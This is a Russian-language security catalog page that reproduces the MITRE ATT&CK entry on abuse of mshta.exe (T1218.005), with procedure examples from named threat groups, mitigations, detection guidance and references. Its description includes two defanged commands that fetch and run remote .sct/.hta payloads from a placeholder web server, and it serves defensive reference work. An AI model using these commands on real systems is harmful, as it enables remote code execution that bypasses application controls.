Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Поиск
Вход Регистрация
MITRE ATT&CK - Техника Утилита mshta
EN
Риски
Каталоги
MITRE ATT&CK
Техника
Утилита mshta
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

System Binary Proxy Execution:  Утилита mshta

ID Название
.001 CHM-файл
.002 Панель управления
.003 Установщик профилей диспетчера подключений (CMSTP)
.004 Утилита InstallUtil
.005 Утилита mshta
.007 Утилита msiexec
.008 Утилита odbcconf
.009 Утилиты Regsvcs и Regasm
.010 Утилита Regsvr32
.011 Rundll32
.012 Verclsid
.013 Mavinject
.014 MMC
.015 Electron Applications

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

ID: T1218.005
Относится к технике:  T1218
Тактика(-и): Defense Evasion
Платформы: Windows
Источники данных: Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation
Версия: 2.1
Дата создания: 23 Jan 2020
Последнее изменение: 25 Apr 2025

Примеры процедур
Название Описание
Covenant

Covenant can create HTA files to install Grunt listeners.(Citation: Github Covenant)
Pteranodon

Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.(Citation: Symantec Shuckworm January 2022)
Lumma Stealer

Lumma Stealer has used mshta.exe to execute additional content.(Citation: Qualys LummaStealer 2024)(Citation: Netskope LummaStealer 2025)
Xbash

Xbash can use mshta for executing scripts.(Citation: Unit42 Xbash Sept 2018)
NanHaiShu

NanHaiShu uses mshta.exe to load its program and files.(Citation: fsecure NanHaiShu July 2016)
Metamorfo

Metamorfo has used mshta.exe to execute a HTA payload.(Citation: FireEye Metamorfo Apr 2018)

Sibot

Sibot has been executed via MSHTA application.(Citation: MSTIC NOBELIUM Mar 2021)
Revenge RAT

Revenge RAT uses mshta.exe to run malicious scripts on the system.(Citation: Cofense RevengeRAT Feb 2019)
Koadic

Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.(Citation: Github Koadic)(Citation: MalwareBytes LazyScripter Feb 2021)

BabyShark

BabyShark has used mshta.exe to download and execute applications from a remote server.(Citation: CISA AA20-301A Kimsuky)
POWERSTATS

POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)
Lazarus Group

Lazarus Group has used mshta.exe to run malicious scripts and download programs.(Citation: F-Secure Lazarus Cryptocurrency Aug 2020)
Lazarus Group

Lazarus Group has used mshta.exe to execute HTML pages downloaded by initial access documents.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
Gamaredon Group

Gamaredon Group has used `mshta.exe` to execute malicious files.(Citation: Symantec Shuckworm January 2022)(Citation: unit42_gamaredon_dec2022)

APT29

APT29 has use `mshta` to execute malicious scripts on a compromised host.(Citation: ESET T3 Threat Report 2021)
TA2541

TA2541 has used `mshta` to execute scripts including VBS.(Citation: Cisco Operation Layover September 2021)

APT38

APT38 has used a renamed version of `mshta.exe` to execute malicious HTML files.(Citation: 1 - appv)

MuddyWater

MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)
SideCopy

SideCopy has utilized `mshta.exe` to execute a malicious hta file.(Citation: MalwareBytes SideCopy Dec 2021)
Confucius

Confucius has used mshta.exe to execute malicious VBScript.(Citation: TrendMicro Confucius APT Feb 2018)

APT32

APT32 has used mshta.exe for code execution.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
Sidewinder

Sidewinder has used mshta.exe to execute malicious payloads.(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)
Inception

Inception has used malicious HTA files to drop and execute malware.(Citation: Kaspersky Cloud Atlas August 2019)
FIN7

FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.(Citation: FireEye FIN7 April 2017)
Kimsuky

Kimsuky has used mshta.exe to run malicious scripts on the system.(Citation: EST Kimsuky April 2019)(Citation: CISA AA20-301A Kimsuky)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: KISA Operation Muzabi)
Mustang Panda

Mustang Panda has used mshta.exe to launch collection scripts.(Citation: Secureworks BRONZE PRESIDENT December 2019)
TA551

TA551 has used mshta.exe to execute malicious payloads.(Citation: Unit 42 TA551 Jan 2021)
Earth Lusca

Earth Lusca has used `mshta.exe` to load an HTA script within a malicious .LNK file.(Citation: TrendMicro EarthLusca 2022)
LazyScripter

LazyScripter has used `mshta.exe` to execute Koadic stagers.(Citation: MalwareBytes LazyScripter Feb 2021)

Контрмеры
Контрмера Описание
Execution Prevention

Prevent the execution of unauthorized or malicious code on systems by implementing application control, script blocking, and other execution prevention mechanisms. This ensures that only trusted and authorized code is executed, reducing the risk of malware and unauthorized actions. This mitigation can be implemented through the following measures: Application Control: - Use Case: Use tools like AppLocker or Windows Defender Application Control (WDAC) to create whitelists of authorized applications and block unauthorized ones. On Linux, use tools like SELinux or AppArmor to define mandatory access control policies for application execution. - Implementation: Allow only digitally signed or pre-approved applications to execute on servers and endpoints. (e.g., `New-AppLockerPolicy -PolicyType Enforced -FilePath "C:\Policies\AppLocker.xml"`) Script Blocking: - Use Case: Use script control mechanisms to block unauthorized execution of scripts, such as PowerShell or JavaScript. Web Browsers: Use browser extensions or settings to block JavaScript execution from untrusted sources. - Implementation: Configure PowerShell to enforce Constrained Language Mode for non-administrator users. (e.g., `Set-ExecutionPolicy AllSigned`) Executable Blocking: - Use Case: Prevent execution of binaries from suspicious locations, such as `%TEMP%` or `%APPDATA%` directories. - Implementation: Block execution of `.exe`, `.bat`, or `.ps1` files from user-writable directories. Dynamic Analysis Prevention: - Use Case: Use behavior-based execution prevention tools to identify and block malicious activity in real time. - Implemenation: Employ EDR solutions that analyze runtime behavior and block suspicious code execution.
Disable or Remove Feature or Program

Disable or remove unnecessary and potentially vulnerable software, features, or services to reduce the attack surface and prevent abuse by adversaries. This involves identifying software or features that are no longer needed or that could be exploited and ensuring they are either removed or properly disabled. This mitigation can be implemented through the following measures: Remove Legacy Software: - Use Case: Disable or remove older versions of software that no longer receive updates or security patches (e.g., legacy Java, Adobe Flash). - Implementation: A company removes Flash Player from all employee systems after it has reached its end-of-life date. Disable Unused Features: - Use Case: Turn off unnecessary operating system features like SMBv1, Telnet, or RDP if they are not required. - Implementation: Disable SMBv1 in a Windows environment to mitigate vulnerabilities like EternalBlue. Control Applications Installed by Users: - Use Case: Prevent users from installing unauthorized software via group policies or other management tools. - Implementation: Block user installations of unauthorized file-sharing applications (e.g., BitTorrent clients) in an enterprise environment. Remove Unnecessary Services: - Use Case: Identify and disable unnecessary default services running on endpoints, servers, or network devices. - Implementation: Disable unused administrative shares (e.g., C$, ADMIN$) on workstations. Restrict Add-ons and Plugins: - Use Case: Remove or disable browser plugins and add-ons that are not needed for business purposes. - Implementation: Disable Java and ActiveX plugins in web browsers to prevent drive-by attacks.

Обнаружение

Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed. Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious

Ссылки

  1. Ventura, V. (2021, September 16). Operation Layover: How we tracked an attack on the aviation industry to five years of compromise. Retrieved September 15, 2023.
  2. Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.
  3. Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.
  4. ESET. (2022, February). THREAT REPORT T3 2021. Retrieved February 10, 2022.
  5. F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020.
  6. Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.
  7. cobbr. (2021, April 21). Covenant. Retrieved September 4, 2024.
  8. Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
  9. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
  10. Vishwajeet Kumar, Qualys. (2024, October 20). Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA. Retrieved March 22, 2025.
  11. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
  12. Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.
  13. Unit 42. (2022, December 20). Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. Retrieved September 12, 2024.
  14. F-Secure Labs. (2016, July). NANHAISHU RATing the South China Sea. Retrieved July 6, 2018.
  15. Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.
  16. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
  17. Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.
  18. Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved November 17, 2024.
  19. McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.
  20. Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group's Cyberespionage Operations. Retrieved December 26, 2021.
  21. LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
  22. Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022.
  23. SEONGSU PARK. (2022, December 27). BlueNoroff introduces new methods bypassing MoTW. Retrieved February 6, 2024.
  24. Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
  25. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.
  26. Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.
  27. Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.
  28. Coulter, D. et al.. (2019, April 9). Microsoft recommended block rules. Retrieved August 12, 2021.
  29. Leandro Fróes, Netskope. (2025, January 23). Lumma Stealer: Fake CAPTCHAs & New Techniques to Evade Detection. Retrieved March 22, 2025.
  30. Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.
  31. Magius, J., et al. (2017, July 19). Koadic. Retrieved September 27, 2024.
  32. Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
  33. KISA. (2021). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 8, 2024.
  34. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
  35. Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022.
  36. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.
  37. CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.
  38. Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.
  39. Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.
  40. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
  41. Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.
  42. Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.
  43. GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
  44. Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021.
Навигация

Связанные риски

Ничего не найдено

Каталоги

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.